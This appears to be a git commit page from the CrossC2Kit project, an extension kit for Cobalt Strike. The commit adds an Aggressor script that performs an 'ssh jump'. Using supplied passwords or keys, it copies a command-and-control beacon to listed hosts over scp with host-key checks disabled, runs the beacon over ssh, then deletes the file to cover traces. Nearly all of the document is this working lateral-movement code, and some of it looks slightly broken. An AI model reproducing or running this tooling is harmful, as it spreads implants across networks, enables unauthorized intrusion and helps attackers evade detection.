support ssh jump

Former-commit-id: ff49014
gloxec · Sep 13, 2021 · a13578b · a13578b
1 parent 9590d74
commit a13578b
Show file tree

Hide file tree

Showing 3 changed files with 176 additions and 0 deletions.
diff --git a/CrossC2Kit/CrossC2Kit_Loader.cna b/CrossC2Kit/CrossC2Kit_Loader.cna
@@ -15,6 +15,7 @@ include(script_resource("gather/keychain/keychain_dump.cna"));
 include(script_resource("gather/message/iMessage_dump.cna"));
 include(script_resource("utils/portscan_result.cna"));
 include(script_resource("process/processhelper.cna"));
+include(script_resource("sshpass/sshpass.cna"));
 
 sub openMemoryFileLoadDialogCallBack {
     $taskFile = $3['taskFile'];

diff --git a/CrossC2Kit/sshpass/sshpass.cna b/CrossC2Kit/sshpass/sshpass.cna
@@ -0,0 +1,175 @@
+sub bssh_pass {
+    local('$bid $username $password $privatekey $passtype $host $ObjectPath $taskName $taskType $taskResType');
+    local('$upload_beacon_line $transArray $upload_beacon $cmd $trans $run_beacon $bd $os $arch $loadlib');
+    $bid = $1;
+    $username = $2;
+    $password = $3;
+    $privatekey = $4;
+    $passtype = $5;
+    $host = $6;
+    $ObjectPath = $7;
+
+    $taskName = "cc2_sshpass";
+    $taskType = "ELF";
+    $taskResType = "info";
+
+    # upload beacon
+    $upload_beacon_line = "python -p ".$password." scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ".$ObjectPath.' '.$username."@".$host.":".$ObjectPath;
+    $transArray = split(" ", ["$upload_beacon_line" trim]);
+    $upload_beacon = transportArgs(0, $transArray);
+
+    $transArray = $null;
+
+    # run beacon
+    $cmd = 'chmod 755 '.$ObjectPath.';'.$ObjectPath.';sleep 10;rm -rf '.$ObjectPath;
+    $trans = "python -p ".$password." ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ".$username."@".$host;
+    $transArray = split(" ", ["$trans" trim]);
+    add($transArray, $cmd, -1);
+    $run_beacon = transportArgs(0, $transArray);
+
+    $bd = bdata($bid);
+    $os = lc(beacon_info($bid, "os"));
+    $arch = beacon_info($bid, "arch");
+    $loadlib = $null;
+    btask($bid, "RUN: cc2_sshpass");
+
+    if ('linux' isin $os) {
+        if ($arch eq 'x86') {
+            $loadlib = 'sshpass/sshpass32';
+        } else if ($arch eq 'x64') {
+            $loadlib = 'sshpass/sshpass64';
+        }
+    } else if ('macos' isin $os) {
+        $loadlib = 'sshpass/sshpass';
+    }
+
+    if ($host && $username && (($password ne "") || ($privatekey ne "")) && $loadlib) {
+        btask($bid, 'ssh pass -> '.$username.'@'.$host);
+        btask($bid, 'upload beacon to '.$username.'@'.$host);
+        bcrossc2_load_dyn_pro($bid, $taskType, $taskName, $taskResType, 'Y', 'N', 11, $loadlib, $upload_beacon);
+        btask($bid, 'run beacon on '.$username.'@'.$host);
+        bcrossc2_load_dyn_pro($bid, $taskType, $taskName, $taskResType, 'Y', 'N', 11, $loadlib, $run_beacon);
+        bshell($bid, 'sleep 5&&rm -rf '.$ObjectPath);
+    }
+}
+
+sub bssh_jump_cb { 
+    # @($username, $password, $privatekey, $passtype, $hostArray, $cmd)
+    $bid = $1;
+    $username = $2[0];
+    $password = $2[1];
+    $privatekey = $2[2];
+    $passtype = $2[3];
+    $hostArray = $2[4];
+    $cmd = $2[5];
+
+    foreach $index => $value ($targetArray) {
+        bssh_pass($bid, $username, $password, $privatekey, $passtype, $value, $cmd);
+    }
+}
+
+sub bssh_jump {
+    # bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workpath);
+    $bid = $1;
+    $username = $2;
+    $password = $3;
+    $privatekey = $4;
+    $passtype = $5;
+    $listener = $6;
+    $hostArray = $7;
+
+    $savepath = $8;
+    $savename = random_string(8);
+    if ($savepath eq '') {
+        $savepath = '/tmp/';
+    }
+    $ObjectPath = $savepath.'/'.$savename;
+
+
+    btask($bid, "------ sshpass ------");
+    $beaconData = getCrossC2Beacon($listener, "main");
+    if (strlen($beaconData) > 0) {
+        bawait_upload_raw($bid, $beaconData, $savepath, $savename, &bssh_jump_cb, @($username, $password, $privatekey, $passtype, $hostArray, $ObjectPath));
+    } else { 
+        berror($bid, "maybe no beacondata in CrossC2Listener");
+    }
+}
+# reverse_https -> scp upload & ssh run
+# bind_tcp -> althttpd -> ssh ?
+
+
+sub jumpSSHdialogCallBack {
+    $targetLines = $3['targetLines'];
+    $username = $3['username'];
+    $password = $3['password'];
+    $privatekey = $3['privatekey'];
+    $passtype = $3['passtype'];
+    $listener = $3['listener'];
+    $session = $3['session'];
+    $bid = $null;
+    $workspace = $3['workspace'];
+
+    if ($listener && $session) {
+        # get bid with select session
+        foreach $beacon (beacons()) {
+            ($internal, $computer) = values($beacon, @('internal', 'computer'));
+            $tempMenuBar = $internal."@".$computer;
+            if (!-isactive $beacon['id']) {
+            } else if ((-isssh $beacon['id']) && ($tempMenuBar eq $session)) {
+                $bid = $beacon['id'];
+            }
+        }
+
+        if ($bid) {
+            $targetLines = replace($targetLines, '\[', "");
+            $targetLines = replace($targetLines, '\]', "");
+            $targetArray = split(", ", ["$targetLines" trim]);
+
+            bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workspace);
+        }
+    }
+}
+
+sub jumpSSHdialog {
+    %beaconListenerMap = getCrossC2Listener();
+    @beaconListenerMenu = @();
+    foreach $key => $value (%beaconListenerMap) {
+        add(@beaconListenerMenu, $value[0]);
+    }
+
+    @sessionMenu = @();
+    %sessionMap = getSSHSession();
+    foreach $key => $value (%sessionMap) {
+        add(@sessionMenu, $value[0]);
+    }
+
+
+    $targetArray = $2;
+    $dialog = dialog("CrossC2 SSH Jump", %(username => "root", password => "", privatekey => "", $listener => $null, $session => $null, targetLines => $targetArray, passtype => $1, workspace => "/tmp/"), &jumpSSHdialogCallBack);
+    drow_text($dialog, "username", "login username: ", 20);
+    if ($1 eq "ssh") {
+        drow_text($dialog, "password", "login password: ", 20);
+    } else if ($1 eq "ssh-key") {
+        drow_text($dialog, "privatekey", "login privatekey: ", 20);
+    }
+    drow_combobox($dialog, "listener", "CrossC2 Listener: ", @beaconListenerMenu);
+    drow_combobox($dialog, "session", "Session: ", @sessionMenu);
+    drow_text($dialog, "workspace", "workspace: ", 20);
+
+    dbutton_action($dialog, "Jump");
+    dialog_show($dialog);
+}
+
+popup targets {
+    separator();
+    menu "&CC2—Jump" {
+        menu "&sshpass" { 
+            item "ssh" {
+                jumpSSHdialog("ssh", $1);
+            }
+            item "ssh-key" {
+                jumpSSHdialog("ssh-key", $1);
+            }
+        }
+    } 
+}
diff --git a/CrossC2Kit/sshpass/sshpass64 b/CrossC2Kit/sshpass/sshpass64